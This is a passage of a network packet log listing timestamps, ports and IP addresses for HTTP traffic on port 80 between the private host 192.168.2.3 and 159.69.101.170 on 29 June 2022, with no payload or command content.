Jun 29, 2022 23:12:20.514064074 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514066935 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514085054 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514092922 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514118910 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514120102 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514137030 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514147997 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514167070 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514173985 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514199018 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514205933 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514229059 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514231920 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514255047 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514262915 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514286041 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514293909 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514314890 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514319897 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514333010 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514348030 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514372110 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514377117 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514400959 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514409065 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514429092 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514434099 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514463902 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514481068 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514487982 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514513016 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514549971 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514564037 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.515429020 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515450001 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515480995 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515501022 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515515089 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.515537977 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.515537977 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515564919 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515587091 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.515588045 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515630007 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515640020 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.515664101 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.515675068 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515702009 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.515702963 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515721083 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.515731096 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515757084 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515765905 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.515777111 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.515783072 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515809059 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.515815973 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515826941 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.515836954 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515865088 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515882015 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.515894890 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.515899897 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.515913963 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.515955925 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516428947 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516452074 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516496897 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516505957 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516532898 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516544104 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516556025 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516558886 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516591072 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516594887 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516607046 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516616106 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516643047 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516654015 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516665936 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516674995 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516697884 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516702890 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516729116 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516735077 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516746998 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516757965 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516771078 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516779900 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516809940 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516819000 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516832113 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516835928 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516859055 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516865969 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516885042 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516892910 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.516913891 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.516947985 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.517539024 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.517563105 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.517594099 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.517615080 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.517618895 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.517633915 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.517647028 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.517662048 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.517668962 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.517702103 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.517704964 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.517724037 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.517724037 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.517757893 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.517759085 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.517770052 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.517785072 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.517812967 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.517815113 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.517833948 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.517842054 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.517872095 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.517873049 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.517890930 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.517899036 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.517926931 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.517939091 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.518614054 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.518686056 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.519125938 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.519169092 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.519201994 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.519212961 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.519227028 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.519243002 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.519263029 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.519280910 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520252943 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520276070 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520298004 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520324945 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520328045 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520347118 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520373106 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520375013 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520406961 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520423889 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520431995 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520450115 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520461082 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520486116 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520498037 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520519018 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520523071 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520556927 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520581007 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520596027 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520610094 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520617962 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520632982 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520641088 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520662069 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520692110 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520713091 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520739079 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520764112 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520768881 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520782948 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520795107 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520823956 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520834923 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520852089 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520853996 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520869970 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520879984 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520905972 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520906925 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520929098 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520931959 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520962000 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.520965099 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520971060 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.520983934 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521014929 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521019936 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521034002 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521066904 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521070957 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521086931 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521117926 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521121979 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521135092 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521145105 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521173954 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521193027 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521195889 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521229982 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521231890 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521251917 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521260977 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521297932 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521298885 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521322966 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521356106 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521357059 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521368980 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521387100 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521401882 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521414995 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521441936 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521441936 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521461964 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521471977 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521480083 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521498919 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521522045 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521528006 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.521553993 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.521593094 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522020102 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522047997 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522074938 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522077084 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522102118 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522109032 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522121906 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522130966 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522140980 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522160053 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522181988 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522188902 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522212029 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522218943 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522238016 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522244930 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522272110 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522274017 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522284985 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522305012 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522331953 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522331953 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522358894 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522365093 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522393942 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522399902 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522420883 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522434950 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522444010 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522448063 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522464991 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522464991 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522486925 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522494078 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522506952 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522507906 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522532940 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522533894 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.522564888 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.522577047 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523289919 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523317099 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523379087 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523391008 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523391008 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523407936 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523428917 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523448944 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523451090 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523463964 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523474932 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523488998 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523490906 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523509026 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523518085 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523535013 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523540020 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523551941 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523559093 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523572922 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523580074 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523595095 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523603916 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523614883 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523627043 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523633003 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523649931 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523665905 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523677111 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523679018 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523696899 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523703098 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523719072 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523720026 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523745060 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523761034 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.523761988 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523772955 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523797035 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.523816109 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.524501085 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.524523973 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.524552107 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.524568081 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.524591923 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.524594069 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.524610043 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.524631023 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.524636030 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.524642944 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.524651051 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.524652958 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.524667025 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.524677992 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.524689913 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.524828911 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.535645008 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.535757065 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.536712885 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.536745071 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.536765099 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.536784887 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.536798000 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.536806107 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.536828041 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.536844015 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.536849022 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.536870956 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.536885023 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.536890984 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.536900997 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.536936998 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.536937952 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.536974907 CEST	80	49792	159.69.101.170	192.168.2.3
